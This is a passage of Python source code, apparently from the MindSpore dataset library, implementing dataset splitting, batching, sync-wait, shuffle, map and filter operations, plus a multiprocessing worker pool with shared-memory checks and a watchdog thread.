of execution, otherwise each shard may not be part of the same split (see Examples).
3. It is strongly recommended to not shuffle the dataset, but use randomize=True instead.
Shuffling the dataset may not be deterministic, which means the data in each split
will be different in each epoch. Furthermore, if sharding occurs after split, each
shard may not be part of the same split.
Raises:
RuntimeError: If get_dataset_size returns None or is not supported for this dataset.
RuntimeError: If `sizes` is list of integers and sum of all elements in sizes does not
equal the dataset size.
RuntimeError: If `sizes` is list of float and there is a split with size 0 after calculations.
RuntimeError: If the dataset is sharded prior to calling split.
ValueError: If `sizes` is list of float and not all floats are between 0 and 1, or if the
floats don't sum to 1.
Returns:
tuple(Dataset), a tuple of datasets that have been split.
Examples:
>>> # Since many datasets have shuffle on by default, set shuffle to False if split will be called!
>>> dataset = ds.ImageFolderDataset(image_folder_dataset_dir, shuffle=False)
>>>
>>> # Set the seed, and tell split to use this seed when randomizing.
>>> # This is needed because sharding will be done later
>>> ds.config.set_seed(58)
>>> train_dataset, test_dataset = dataset.split([0.9, 0.1])
>>>
>>> # To shard the train dataset, use a DistributedSampler
>>> train_sampler = ds.DistributedSampler(10, 2)
>>> train_dataset.use_sampler(train_sampler)
"""
if self.is_shuffled():
logger.warning("Dataset is shuffled before split.")
if self.is_sharded():
raise RuntimeError("Dataset should not be sharded before split.")
absolute_sizes = self._get_absolute_split_sizes(sizes)
splits = []
current_split_start_index = 0
for size in absolute_sizes:
ds = copy.deepcopy(self)
ds.dataset_size = None
if randomize:
# want to shuffle the same way every epoch before split, we are assuming
# that the user will call set_seed
random_sampler = samplers.RandomSampler()
random_sampler.reshuffle_each_epoch = False
ds.add_sampler(random_sampler)
subset_sampler = samplers.SequentialSampler(current_split_start_index, size)
ds.add_sampler(subset_sampler)
# add sequential sampler, so that if user calls use_sampler, we will
# get rid of the sequential sampler instead of something we need
ds.add_sampler(samplers.SequentialSampler())
splits.append(ds)
current_split_start_index += size
return tuple(splits)
class BucketBatchByLengthDataset(UnionBaseDataset):
"""
The result of applying BucketBatchByLength operator to the input dataset.
"""
def __init__(self, input_dataset, column_names, bucket_boundaries, bucket_batch_sizes, element_length_function,
pad_info, pad_to_bucket_boundary, drop_remainder):
super().__init__(children=input_dataset)
self.column_names = to_list(column_names)
self.bucket_boundaries = replace_none(bucket_boundaries, [])
self.bucket_batch_sizes = replace_none(bucket_batch_sizes, [])
self.element_length_function = element_length_function
self.pad_info = replace_none(pad_info, {})
self.pad_to_bucket_boundary = replace_none(pad_to_bucket_boundary, False)
self.drop_remainder = replace_none(drop_remainder, False)
def parse(self, children=None):
return cde.BucketBatchByLengthNode(children[0], self.column_names, self.bucket_boundaries,
self.bucket_batch_sizes, self.element_length_function, self.pad_info,
self.pad_to_bucket_boundary, self.drop_remainder)
def _check_shm_usage(num_worker, queue_size, max_rowsize, num_queues=1):
"""
Check that sufficient shared memory is available for the shared memory queues
when training in parallel mode.
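For example (illustrative numbers only): 1 device, 8 workers, 1 queue, queue_size=6 and
max_rowsize=16 give an estimate of 1 * 8 * 1 * (6 + 2) * 16 MB = 1024 MB, which must stay
below 80% of the free space reported for /dev/shm.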
"""
threshold_ratio = 0.8
if platform.system().lower() not in {"windows", "darwin"}:
device_num = _get_device_num()
# In the cluster, _get_device_num indicates the number of the entire cluster. The maximum number of cards
# on the ascend server is 8.
if device_num > 1 and context.get_context("device_target") == "Ascend":
device_num = min(device_num, 8)
shm_estimate_usage = device_num * num_worker * num_queues * \
(queue_size + 2) * max_rowsize * 1024 * 1024
try:
shm_available = psutil.disk_usage('/dev/shm').free
if shm_estimate_usage >= threshold_ratio * shm_available:
raise RuntimeError(
"Insufficient shared memory available. Required: {}, Available: {}. "
"The required memory can't exceed 80% of the available shared memory, "
"it's recommended to reduce memory usage by following methods:\n"
"1. reduce value of parameter max_rowsize or num_parallel_workers.\n"
"2. reduce prefetch size by set_prefetch_size().\n"
"3. disable shared memory by set_enable_shared_mem()."
.format(shm_estimate_usage, shm_available))
except FileNotFoundError:
raise RuntimeError("Expected /dev/shm to exist.")
class BatchDataset(UnionBaseDataset):
"""
The result of applying Batch operator to the input dataset.
Args:
input_dataset (Dataset): Input Dataset to be batched.
batch_size (Union[int, function]): The number of rows each batch is created with. An
int or callable which takes exactly 1 parameter, BatchInfo.
drop_remainder (bool, optional): Determines whether or not to drop the last
possibly incomplete batch (default=False). If True, and if there are less
than batch_size rows available to make the last batch, then those rows will
be dropped and not propagated to the child node.
num_parallel_workers (int, optional): Number of workers to process the dataset in parallel (default=None).
per_batch_map (callable, optional): Per batch map callable. A callable which takes
(list[Tensor], list[Tensor], ..., BatchInfo) as input parameters. Each list[Tensor] represents a batch of
Tensors on a given column. The number of lists should match with number of entries in input_columns. The
last parameter of the callable must always be a BatchInfo object.
input_columns (Union[str, list[str]], optional): List of names of the input columns. The size of the list must
match with signature of per_batch_map callable.
output_columns (Union[str, list[str]], optional): List of names assigned to the columns outputted by
the last operation. This parameter is mandatory if len(input_columns) !=
len(output_columns). The size of this list must match the number of output
columns of the last operation. (default=None, output columns will have the same
name as the input columns, i.e., the columns will be replaced).
column_order (Union[str, list[str]], optional): Specifies the list of all the columns you need in the whole
dataset. The parameter is required when len(input_columns) != len(output_columns). Caution: the list here
is not just the columns specified in parameter input_columns and output_columns.
pad_info (dict, optional): Whether to perform padding on selected columns. pad_info={"col1":([224,224],0)}
will pad column with name "col1" to a tensor of size [224,224] and fill the missing with 0.
max_rowsize (int, optional): Maximum size of row in MB that is used for shared memory allocation to copy
data between processes. This is only used if python_multiprocessing is set to True (default=16).
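Examples:
>>> # A minimal sketch of the typical entry point, Dataset.batch(); assumes that
>>> # `dataset` already exists and has a column named "col1".
>>> import numpy as np
>>> def add_one(col1, batch_info):
...     # per_batch_map receives one list per input column plus a BatchInfo object
...     return ([np.array(c) + 1 for c in col1],)
>>> dataset = dataset.batch(batch_size=4, drop_remainder=True,
...                         input_columns=["col1"], per_batch_map=add_one)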
"""
def __init__(self, input_dataset, batch_size, drop_remainder=False, num_parallel_workers=None, per_batch_map=None,
input_columns=None, output_columns=None, column_order=None, pad_info=None,
python_multiprocessing=False, max_rowsize=16):
super().__init__(children=input_dataset, num_parallel_workers=num_parallel_workers)
if BatchDataset._is_ancestor_of_repeat(input_dataset):
logger.warning("Repeat is located before batch, data from two epochs can be batched together.")
BatchDataset._update_batch_size_for_syncwait(input_dataset, batch_size)
# if batch_size is callable, set batch_size to 1 and batch_size_func to that callable function
self.batch_size = batch_size if not callable(batch_size) else 1
self.batch_size_func = None if not callable(batch_size) else batch_size
self.drop_remainder = replace_none(drop_remainder, False)
self.per_batch_map = per_batch_map
self.input_columns = to_list(input_columns)
self.output_columns = to_list(output_columns)
self.column_order = to_list(column_order)
self.pad = bool(pad_info is not None)
self.pad_info = replace_none(pad_info, dict())
self.python_multiprocessing = python_multiprocessing
self.process_pool = None
self.max_rowsize = max_rowsize
def parse(self, children=None):
return cde.BatchNode(children[0], self.batch_size, self.drop_remainder, self.pad, self.input_columns,
self.output_columns, self.column_order, self.batch_size_func, self.per_batch_map,
self.pad_info)
@staticmethod
def _is_ancestor_of_repeat(dataset):
"""
Utility function to find the case where repeat is used before batch.
Args:
dataset (Dataset): Dataset to be checked.
Returns:
bool, whether repeat is used before batch.
"""
if isinstance(dataset, RepeatDataset):
return True
flag = False
for input_dataset in dataset.children:
flag = flag | BatchDataset._is_ancestor_of_repeat(input_dataset)
return flag
@staticmethod
def _update_batch_size_for_syncwait(dataset, batch_size):
"""
Utility function to notify batch size to sync_wait.
Args:
dataset (Dataset): Dataset to be checked.
batch_size (int): batch size to notify.
"""
if isinstance(dataset, SyncWaitDataset):
dataset.update_sync_batch_size(batch_size)
for input_dataset in dataset.children:
BatchDataset._update_batch_size_for_syncwait(input_dataset, batch_size)
def __deepcopy__(self, memodict):
return self.__safe_deepcopy__(memodict, exclude=("per_batch_map", "batch_size_func", "__transfer_dataset__"))
# Iterator bootstrap will be called on iterator construction.
# A deep copy of Dataset object is created prior of iterator_bootstrap.
# This method will create per iterator process pool and bind pyfunc execution to the pool.
def iterator_bootstrap(self):
"""
Per iterator bootstrap callback.
"""
if self.python_multiprocessing:
if self.per_batch_map is None:
logger.warning("per_batch_map is None so python_multiprocessing does not work.")
return
# If user didn't specify num_parallel_workers, set it to default
if self.num_parallel_workers is None:
self.num_parallel_workers = get_num_parallel_workers()
self.process_pool = _PythonMultiprocessing(str(self), self.num_parallel_workers, [self.per_batch_map],
self.max_rowsize * self.batch_size)
# Wrap per_batch_map into _PythonCallable
self.per_batch_map = _PythonCallable(self.per_batch_map, 0, self.process_pool)
else:
if self.per_batch_map is not None:
self.per_batch_map = FuncWrapper(self.per_batch_map)
class BatchInfo(cde.CBatchInfo):
"""
Only the batch size function and per_batch_map of the batch operator can dynamically adjust parameters
based on the number of batches and epochs during training.
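Examples:
>>> # A minimal sketch (assumes `dataset` already exists): a callable batch_size that
>>> # uses BatchInfo to grow the batch size with the epoch number.
>>> def batch_size_func(batch_info):
...     return batch_info.get_epoch_num() + 2
>>> dataset = dataset.batch(batch_size=batch_size_func)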
"""
def get_batch_num(self):
"""
Return the batch number of the current batch.
"""
return
def get_epoch_num(self):
"""
Return the epoch number of the current batch.
"""
return
class BlockReleasePair:
"""
The blocking condition class used by SyncWaitDataset.
Args:
init_release_rows (int): Number of rows to allow through the pipeline.
callback (function): The callback function that will be called when release is called (default=None).
"""
def __init__(self, init_release_rows, callback=None):
if isinstance(init_release_rows, int) and init_release_rows <= 0:
raise ValueError("release_rows need to be greater than 0.")
self.row_count = -init_release_rows
self.cv = threading.Condition()
self.callback = callback
self.default_rows = init_release_rows
self.disable = False
def __deepcopy__(self, memodict):
return self
def reset(self):
with self.cv:
self.row_count = -self.default_rows
self.cv.notify_all()
def update_batched_size(self, batch_size):
# sanity check
if isinstance(batch_size, int) and batch_size <= 0:
raise ValueError("batch_size need to be greater than 0.")
# should only be used before the pipeline is created
self.row_count *= batch_size
self.default_rows *= batch_size
def block_func(self):
"""
Function for handling the blocking condition.
Returns:
bool, True.
"""
with self.cv:
# if disable is true, always evaluate to true
not_time_out = self.cv.wait_for(lambda: (self.row_count < 0 or self.disable),
timeout=get_callback_timeout())
# not_time_out will be False if a timeout occurs
if not not_time_out:
logger.warning("Timeout happened in sync_wait, maybe dataset.sync_update(condition=...) "
"is not added after dataset.create_dict_iterator(...), now disabling lock.")
self.disable = True
self.row_count += 1
return True
def release_func(self, pass_rows=None, data=None):
with self.cv:
if pass_rows is None:
pass_rows = self.default_rows
self.row_count -= pass_rows
if self.callback is not None:
self.callback(data)
self.cv.notify_all()
def disable_lock(self):
with self.cv:
self.disable = True
self.cv.notify_all()
class SyncWaitDataset(UnionBaseDataset):
"""
The result of adding a blocking condition to the input Dataset.
Args:
input_dataset (Dataset): Input dataset to apply flow control.
num_batch (int): Number of batches without blocking at the start of each epoch.
condition_name (str): Condition name that is used to toggle sending next row.
callback (function): Callback function that will be invoked when sync_update is called (default=None).
Raises:
RuntimeError: If condition name already exists.
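Examples:
>>> # A minimal sketch of the sync_wait/sync_update pairing (assumes `dataset` is a
>>> # small mappable dataset); "policy" is an illustrative condition name.
>>> dataset = dataset.sync_wait(condition_name="policy", num_batch=1)
>>> dataset = dataset.batch(batch_size=2)
>>> for item in dataset.create_dict_iterator(num_epochs=1, output_numpy=True):
...     dataset.sync_update(condition_name="policy")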
"""
def __init__(self, input_dataset, condition_name, num_batch, callback=None):
super().__init__(children=input_dataset)
# set to the default value, waiting for the batch to update it
self._condition_name = condition_name
if isinstance(num_batch, int) and num_batch <= 0:
raise ValueError("num_batch need to be greater than 0.")
self._pair = BlockReleasePair(num_batch, callback)
if self._condition_name in self.children[0].get_sync_notifiers():
raise RuntimeError("Condition name is already in use.")
logger.info("Please remember to add dataset.sync_update(condition=%s), otherwise hanging will result. "
"If dataset.sync_update(condition=%s) has already been added, you can ignore the info.",
condition_name, condition_name)
def parse(self, children=None):
return cde.SyncWaitNode(children[0], self._condition_name, self._pair.block_func)
def get_sync_notifiers(self):
return {**self.children[0].get_sync_notifiers(), **{self._condition_name: self._pair.release_func}}
def is_sync(self):
return True
def update_sync_batch_size(self, batch_size):
if isinstance(batch_size, int) and batch_size <= 0:
raise ValueError("num_batch need to be greater than 0.")
self._pair.update_batched_size(batch_size)
def disable_sync(self):
logger.info("Disabling Sync")
self._pair.disable_lock()
@staticmethod
def _is_ancestor_of_batch(dataset):
"""
Utility function to find the case where sync_wait is used before batch.
Args:
dataset (Dataset): Dataset to be checked.
Returns:
bool, whether sync_wait is used before batch.
"""
if isinstance(dataset, BatchDataset):
return True
flag = False
for input_dataset in dataset.children:
flag = flag | SyncWaitDataset._is_ancestor_of_batch(input_dataset)
return flag
def iterator_bootstrap(self):
self._pair.reset()
class ShuffleDataset(UnionBaseDataset):
"""
The result of applying Shuffle operator to the input Dataset.
Args:
input_dataset (Dataset): Input Dataset to be shuffled.
buffer_size (int): Size of the buffer.
Raises:
RuntimeError: If sync operators exist before shuffle.
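Examples:
>>> # A minimal sketch of the typical entry point, Dataset.shuffle() (assumes
>>> # `dataset` already exists); buffer_size is illustrative.
>>> dataset = dataset.shuffle(buffer_size=4)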
"""
def __init__(self, input_dataset, buffer_size):
super().__init__(children=input_dataset)
self.buffer_size = buffer_size
self.reshuffle_each_epoch = True
if self.is_sync():
raise RuntimeError("No shuffle after sync operators.")
def parse(self, children=None):
return cde.ShuffleNode(children[0], self.buffer_size, self.reshuffle_each_epoch)
def is_shuffled(self):
return True
# Pyfunc collection for multiprocess pyfunc
# This global variable will only be used within subprocesses
_GLOBAL_PYFUNC_LIST = []
_ARGS_QUEUE = []
_RET_QUEUE = []
_OP_NAME = dict()
_OP_PROCESS = dict()
_LOCK = threading.Lock()
# Pyfunc worker init function
# The Python multiprocessing library forbids sending lambda functions through a pipe.
# This init function allows us to add all Python functions to a global collection and then fork afterwards.
def _pyfunc_worker_init(pyfunc_list, args_queue, ret_queue):
global _GLOBAL_PYFUNC_LIST
global _ARGS_QUEUE
global _RET_QUEUE
_GLOBAL_PYFUNC_LIST = pyfunc_list
_ARGS_QUEUE = args_queue
_RET_QUEUE = ret_queue
# Pyfunc worker execution function
# All exceptions will be raised to the main process
def _pyfunc_worker_exec(index, qid, *args):
"""
Internal function for calling a given pyfunc in a Python subprocess.
"""
# Some threads in multiprocessing.pool can't process the SIGINT signal and may hang,
# so Ctrl+C is passed to the parent process.
signal.signal(signal.SIGINT, signal.SIG_IGN)
if qid != -1:
# Pass arguments through the Queue instead of directly to remote process
args = _ARGS_QUEUE[qid].get()
try:
r = _GLOBAL_PYFUNC_LIST[index](*args)
except Exception:
return ExceptionHandler(where="in map(or batch) worker and execute python function")
if isinstance(r, tuple):
_RET_QUEUE[qid].put(r)
else:
_RET_QUEUE[qid].put((r,))
return [qid]
# not using shared memory for passing arguments, call function directly
result = None
try:
result = _GLOBAL_PYFUNC_LIST[index](*args)
except Exception:
result = ExceptionHandler(where="in map(or batch) worker and execute python function")
return result
# PythonCallable wrapper for multiprocess pyfunc
class _PythonCallable:
"""
Internal Python function wrapper for multiprocessing pyfunc.
"""
def __init__(self, py_callable, idx, pool=None):
# Original Python callable from user.
self.py_callable = py_callable
# Process pool created for current iterator.
self.pool = pool
# Python callable index for subprocess _GLOBAL_PYFUNC_LIST
self.idx = idx
def __call__(self, *args):
if self.pool.is_running() and check_iterator_cleanup() is False:
try:
return self.pool.execute(self.py_callable, self.idx, *args)
except multiprocessing.TimeoutError:
return self.py_callable(*args)
# Invoke original Python callable in master process in case the pool is gone.
return self.py_callable(*args)
def to_json(self):
return self.py_callable.to_json()
class _PythonMultiprocessing(cde.PythonMultiprocessingRuntime):
"""
A wrapper to multiprocessing.pool that performs cleanup and ensures proper termination of forked processes.
"""
class _ExceptHookHandler:
"""
Internal class ExceptionHandler
"""
def __init__(self):
sys.excepthook = self.__handler_exception
@staticmethod
def mp_pool_exit_preprocess():
if check_iterator_cleanup() is False:
# Set the iterator_cleanup flag to True before exiting, and wait 3s for all apply_async calls
# applied to the multiprocessing tasks, to prevent multiprocessing from hanging when exiting
_set_iterator_cleanup()
time.sleep(3)
def __handler_exception(self, ex_type, value, tb):
logger.critical("Uncaught exception: ", exc_info=(ex_type, value, tb))
self.mp_pool_exit_preprocess()
def __init__(self, op_name, num_parallel_workers, operations, max_row_size=16):
super(_PythonMultiprocessing, self).__init__()
self.op_name = op_name
self.num_parallel_workers = num_parallel_workers
self.operations = operations
self.max_row_size = max_row_size
self.process_pool = None
self.op_id = -1
self.arg_q_list = []
self.res_q_list = []
self.queues_map = {}
self.next_queue = 0
self.eot = None
self.watch_dog = None
self.workers = []
self.hook = None
def Launch(self, op_id=-1):
self.op_id = op_id
logger.info("Launching new Python Multiprocessing pool for Op:" + str(self.op_id))
self.create_pool()
def create_pool(self):
"""
Returns:
"""
if get_enable_shared_mem():
self.create_shared_memory()
if self.process_pool is not None:
raise Exception("Pool was already created, close it first.")
# Construct python multiprocessing pool.
# The _pyfunc_worker_init is used to pass lambda functions to subprocesses.
self.process_pool = multiprocessing.Pool(processes=self.num_parallel_workers,
initializer=_pyfunc_worker_init,
initargs=(self.operations,
self.arg_q_list, self.res_q_list))
self.gather_workers_info()
self.hook = _PythonMultiprocessing._ExceptHookHandler()
# The op (Map, Batch, etc) multiprocessing will launch a watch dog thread for monitoring sub processes
self._launch_watch_dog()
atexit.register(self.hook.mp_pool_exit_preprocess)
# If the Python version is 3.8 or greater, we need to close the pool in atexit to avoid an unclean pool teardown.
if sys.version_info >= (3, 8):
atexit.register(self.process_pool.close)
def Terminate(self):
logger.info("Terminating Python Multiprocessing pool for Op:" + str(self.op_id))
self.delete_shared_memory()
self.close_pool()
self.abort_watchdog()
self.process_pool = None
def GetPIDs(self):
# obtain process IDs from multiprocessing.pool
return [w.pid for w in self.workers]
def AddNewWorkers(self, num_new_workers):
logger.info(
"Increasing num_parallel_workers of Python Multiprocessing pool for Op:" + str(self.op_id) +
", old num_workers=" + str(self.num_parallel_workers) + " new num_workers" + str(self.num_parallel_workers +
num_new_workers) + ".")
self.Terminate()
self.num_parallel_workers += num_new_workers
self.Launch(self.op_id)
def RemoveWorkers(self, num_removed_workers):
logger.info(
"Decreasing num_parallel_workers of Python Multiprocessing pool for Op:" + str(self.op_id) +
", old num_workers=" + str(self.num_parallel_workers) + " new num_workers" + str(self.num_parallel_workers -
num_removed_workers) + ".")
self.Terminate()
self.num_parallel_workers -= num_removed_workers
self.Launch(self.op_id)
def IsMPEnabled(self):
return self.process_pool is not None
def create_shared_memory(self):
_check_shm_usage(self.num_parallel_workers, 1, self.max_row_size, 2)
self.arg_q_list = []
self.res_q_list = []
self.queues_map = {}
self.next_queue = 0
for _ in range(self.num_parallel_workers):
self.arg_q_list.append(_SharedQueue(1, max_rowsize=self.max_row_size))
self.res_q_list.append(_SharedQueue(1, max_rowsize=self.max_row_size))
def delete_shared_memory(self):
"""
Call this method to delete any shared memory created for this pool.
"""
if hasattr(self, 'arg_q_list') and self.arg_q_list is not None:
arg_q_list_len = len(self.arg_q_list)
for idx in range(arg_q_list_len):
del self.arg_q_list[arg_q_list_len - idx - 1]
del self.arg_q_list
if hasattr(self, 'res_q_list') and self.res_q_list is not None:
res_q_list_len = len(self.res_q_list)
for idx in range(res_q_list_len):
del self.res_q_list[res_q_list_len - idx - 1]
del self.res_q_list
# recreate the lists for next pool creation
self.arg_q_list = []
self.res_q_list = []
def gather_workers_info(self):
"""
Collect the PIDs of the children processes.
"""
self.workers = [w for w in self.process_pool._pool] # pylint: disable=W0212
pids = self.GetPIDs()
logger.info("Op: " + str(self.op_id) + " Python multiprocessing pool workers' PIDs: " + str(pids))
def execute(self, py_callable, idx, *args):
"""
Execute the given Python callable, either through the process pool or directly in this process.
"""
if self.is_running() and check_iterator_cleanup() is False:
result, qid, ret = self._send(py_callable, idx, *args)
if ret:
return result
# todo this check might be wrong
while check_iterator_cleanup() is False:
try:
return self._receive(result, qid)
except multiprocessing.TimeoutError:
continue
except KeyboardInterrupt:
_set_iterator_cleanup()
self.close_pool()
raise Exception("Multiprocess Op worker receives KeyboardInterrupt.")
return (None,)
return None
def _send(self, py_callable, idx, *args):
"""
The map/batch operator will use multiprocessing-pool apply_async interface to execute python function
in a sub process, apply_async will release GIL temporarily. For better performance, we use shared memory
feature and pass shared queue instead of multiprocess args.
"""
ret = False
qid = None
if self.arg_q_list:
tid = threading.get_ident()
# Need to register each thread to use a different queue to send data to pool
if tid not in self.queues_map:
qid = self.next_queue
self.next_queue += 1
self.queues_map[tid] = qid
else:
qid = self.queues_map[tid]
self.arg_q_list[qid].put(args)
# This call will send the tensors along with Python callable index to the process pool.
# Block, yield GIL. Current thread will reacquire GIL once result is returned.
if self.is_running() and check_iterator_cleanup() is False:
result = self.process_pool.apply_async(_pyfunc_worker_exec, [idx, qid, []])
else:
ret = True
result = py_callable(*args)
else:
result = self.process_pool.apply_async(_pyfunc_worker_exec, [idx, -1, *args])
return result, qid, ret
def _receive(self, result, qid):
"""
The map/batch operator will use multiprocessing-pool get interface to sync output data from a sub process,
get interface will reacquire GIL. For better performance, we use shared memory feature and get data from
shared queue directly.
"""
if self.arg_q_list:
r = result.get(30)
if isinstance(r, ExceptionHandler):
r.reraise()
if r[0] != qid:
raise Exception("In PyCallable, got results from wrong thread")
r = self.res_q_list[qid].get()
return r
r = result.get(30)
if isinstance(r, ExceptionHandler):
r.reraise()
return r
# This wait function is for cleaning zombie subprocesses
@staticmethod
def wait_pid():
"""
This function is used by the main process to release subprocess resources.
"""
try:
while True:
child_pid, _ = os.waitpid(-1, os.WNOHANG)
if child_pid == 0:
break
except OSError:
# waitpid may fail for some reason, so we ignore this error
pass
# The dataset needs a watch_dog thread to monitor forked multiprocessing,
# and the thread can't be a member function, otherwise Python won't collect and release the resources.
@staticmethod
def _watch_dog(eot, workers, pool=None):
"""
This thread is for monitoring subprocesses forked by GeneratorDataset/map/batch
"""
if not isinstance(workers, list):
raise TypeError("[Internal Error] The 2nd parameter of watch dog thread should be list of process, " \
"but got {}.".format(type(workers)))
if pool is not None and not isinstance(pool, multiprocessing.pool.Pool):
raise TypeError("[Internal Error] The 3rd parameter of watch dog thread should be multiprocessing.Pool, " \
"but got {}".format(type(pool)))
while not eot.is_set():
subprocess_exit_num = 0
# Monitor and count how many subprocesses have already exited
subprocess_exit_num = _PythonMultiprocessing._monitor_subprocess_exit(workers)
# If a subprocess exit is detected, we will wait for 30s and do some waitpid operations
if subprocess_exit_num > 0:
if pool is not None:
# Python multiprocessing.pool has a bug: if a subprocess of the pool is killed, the pool will launch
# a new subprocess, so we have to set _worker_handler._state to TERMINATE to stop relaunching.
if pool._state == RUN: # pylint: disable=W0212
pool._state = TERMINATE # pylint: disable=W0212
pool._worker_handler._state = TERMINATE # pylint: disable=W0212
start = time.time()
while time.time() - start < 30:
# We need to distinguish the case where get_dataset_size or training finished normally from the
# hang scenario. If get_dataset_size or training finished normally, _stop_subprocess can be executed
# and self.need_abort can be set to True. If the main process hangs in get(), self.need_abort
# will never be set to True; in that case we wait for 30s and then kill the main process.
if eot.is_set():
return
# Sometimes a subprocess may be a zombie, so during these 30s we wait and do some useful work (waitpid).
_PythonMultiprocessing.wait_pid()
# multiprocessing.Queue may hang in .get() forever when the put() process was killed.
# We have to exit the main process, otherwise it will hang.
if pool is not None:
_PythonMultiprocessing._terminate_process(pool._pool) # pylint: disable=W0212
else:
_PythonMultiprocessing._terminate_process(workers)
logger.critical("The subprocess of dataset may exit unexpected or be killed, "
"main process will exit.")
os.kill(os.getpid(), signal.SIGTERM)
@staticmethod
# Terminate subprocess launched by multiprocessing.pool
def _terminate_process(workers):
for w in workers:
if w.exitcode is None:
w.terminate()
for w in workers:
if w._closed is False: # pylint: disable=W0212
w.join()
# Monitor the exit number of subprocesses
@staticmethod
def _monitor_subprocess_exit(workers):
subprocess_exit_num = 0
for w in workers:
if w.exitcode is not None:
subprocess_exit_num += 1
return subprocess_exit_num
def _launch_watch_dog(self):
if platform.system().lower() != 'windows':
self.eot = threading.Event()
self.watch_dog = threading.Thread(target=self._watch_dog, args=(self.eot, self.workers, self.process_pool))
self.watch_dog.daemon = True
self.watch_dog.start()
def _abort_watchdog(self):
if not self.eot.is_set():
self.eot.set()
def abort_watchdog(self):
if hasattr(self, 'watch_dog') and self.watch_dog is not None and hasattr(self, 'eot') and self.eot is not None:
self._abort_watchdog()
def is_running(self):
# note here: the RUN state of python3.7 and python3.8 is different:
# python3.7: RUN = 0
# python3.8: RUN = "RUN"
# so we use self.pool._state == RUN instead and we can't use _state == 0 any more.
if self.process_pool is not None and self.process_pool._state == RUN: # pylint: disable=W0212
return True
return False
def close_pool(self):
if hasattr(self, 'process_pool') and self.process_pool is not None:
self.process_pool.close()
self.process_pool.join()
def __del__(self):
# Clean up when the iterator has been deleted from ITERATORS_LIST
self.Terminate()
class MapDataset(UnionBaseDataset):
"""
The result of applying the Map operator to the input Dataset.
Args:
input_dataset (Dataset): Input Dataset to be mapped.
operations (Union[list[TensorOperation], list[functions]]): A function mapping a nested structure of tensors
to another nested structure of tensors (default=None).
input_columns (Union[str, list[str]]): List of names of the input columns
(default=None, the operations will be applied on the first columns in the dataset).
The size of the list should match the number of inputs of the first operator.
output_columns (Union[str, list[str]], optional): List of names of the output columns.
The size of the list should match the number of outputs of the last operator
(default=None, output columns will be the input columns, i.e., the columns will
be replaced).
column_order (list[str], optional): Specifies the list of all the columns you need in the whole
dataset. The parameter is required when len(input_columns) != len(output_columns). Caution: the list here
is not just the columns specified in parameter input_columns and output_columns.
num_parallel_workers (int, optional): Number of workers to process the dataset
in parallel (default=None).
python_multiprocessing (bool, optional): Parallelize Python operations with multiple worker processes. This
option could be beneficial if the Python operation is computationally heavy (default=False).
cache (DatasetCache, optional): Use tensor caching service to speed up dataset processing.
(default=None, which means no cache is used).
callbacks (DSCallback, list[DSCallback], optional): List of Dataset callbacks to be called (Default=None)
max_rowsize (int, optional): Maximum size of row in MB that is used for shared memory allocation to copy
data between processes. This is only used if python_multiprocessing is set to True (default=16).
offload (bool, optional): Flag to indicate whether offload is used (Default=None).
Raises:
ValueError: If len(input_columns) != len(output_columns) and column_order is not specified.
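Examples:
>>> # A minimal sketch of the typical entry point, Dataset.map(); assumes `dataset`
>>> # has an "image" column holding encoded images.
>>> import mindspore.dataset.vision.c_transforms as c_vision
>>> dataset = dataset.map(operations=[c_vision.Decode(), c_vision.Resize((224, 224))],
...                       input_columns=["image"], num_parallel_workers=2)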
"""
def __init__(self, input_dataset, operations=None, input_columns=None, output_columns=None, column_order=None,
num_parallel_workers=None, python_multiprocessing=False, cache=None, callbacks=None, max_rowsize=16,
offload=None):
super().__init__(children=input_dataset, num_parallel_workers=num_parallel_workers, cache=cache)
self.operations = to_list(operations)
self.operations = py_transforms.Compose.reduce(self.operations)
self.input_columns = to_list(input_columns)
self.output_columns = to_list(output_columns)
self.column_order = replace_none(column_order, [])
# If output_columns were not provided then use input_columns
self.output_columns = self.input_columns if not self.output_columns else self.output_columns
if self.input_columns and self.output_columns \
and len(self.input_columns) != len(self.output_columns) \
and not self.column_order:
raise ValueError("When length of input_columns and output_columns are not equal,"
" column_order must be specified.")
self.python_multiprocessing = python_multiprocessing
self.process_pool = None
self.callbacks = to_list(callbacks)
self.max_rowsize = max_rowsize
self.offload = offload
def parse(self, children=None):
operations = []
for op in self.operations:
if op and getattr(op, 'parse', None):
operations.append(op.parse())
else:
operations.append(op)
callbacks = [cb.create_runtime_obj() for cb in self.callbacks]
return cde.MapNode(children[0], operations, self.input_columns, self.output_columns, self.column_order,
callbacks, self.max_rowsize, OffloadToManualOffloadMode.get(self.offload), self.process_pool)
def __deepcopy__(self, memodict):
return self.__safe_deepcopy__(memodict, exclude=("operations", "callbacks", "__transfer_dataset__"))
# Iterator bootstrap will be called on iterator construction.
# A deep copy of Dataset object is created prior of iterator_bootstrap.
# This method will create per iterator process pool and bind pyfunc execution to the pool.
def iterator_bootstrap(self):
"""
Per iterator bootstrap callback.
"""
if self.python_multiprocessing:
iter_specific_operations = []
callable_list = []
# If user didn't specify num_parallel_workers, set it to default
if self.num_parallel_workers is None:
self.num_parallel_workers = get_num_parallel_workers()
# Pass #1, look for Python callables and build list
for op in self.operations:
# Our C transforms are now callable and should not be run in Python multithreading
if MapDataset.__operation_valid_for_multiprocessing(op):
callable_list.append(op)
if callable_list:
self.process_pool = _PythonMultiprocessing(str(self), self.num_parallel_workers, callable_list,
self.max_rowsize)
# Pass #2
idx = 0
for op in self.operations:
# Our C transforms are now callable and should not be run in Python multithreading
if MapDataset.__operation_valid_for_multiprocessing(op):
# Wrap Python callable into _PythonCallable
iter_specific_operations.append(_PythonCallable(op, idx, self.process_pool))
idx += 1
else:
# CPP ops remain the same
iter_specific_operations.append(op)
self.operations = iter_specific_operations
@staticmethod
def __operation_valid_for_multiprocessing(op):
if callable(op) and str(op).find("c_transform") < 0:
return True
return False
class FilterDataset(UnionBaseDataset):
"""
The result of applying filter predicate to the input Dataset.
Args:
input_dataset (Dataset): Input Dataset to be mapped.
predicate (callable): Python callable which returns a boolean value. If it returns False, the element is filtered out.
input_columns (Union[str, list[str]], optional): List of names of the input columns
(default=None, the predicate will be applied to all columns in the dataset).
num_parallel_workers (int, optional): Number of workers to process the dataset
in parallel (default=None).
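Examples:
>>> # A minimal sketch of the typical entry point, Dataset.filter(); assumes
>>> # `dataset` has a numeric "data" column.
>>> dataset = dataset.filter(predicate=lambda data: data < 11, input_columns=["data"])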
"""
def __init__(self, input_dataset, predicate, input_columns=None, num_parallel_workers=None):
super().__init__(children=input_dataset, num_parallel_workers=num_parallel_workers)
self.predicate = lambda *args: bool(predicate(*args))
self.input_columns = to_list(input_columns)
def parse(self, children=None):
